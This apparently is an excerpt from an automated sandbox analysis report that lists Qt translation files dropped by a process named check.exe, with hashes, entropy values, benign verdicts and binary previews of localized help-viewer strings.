                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
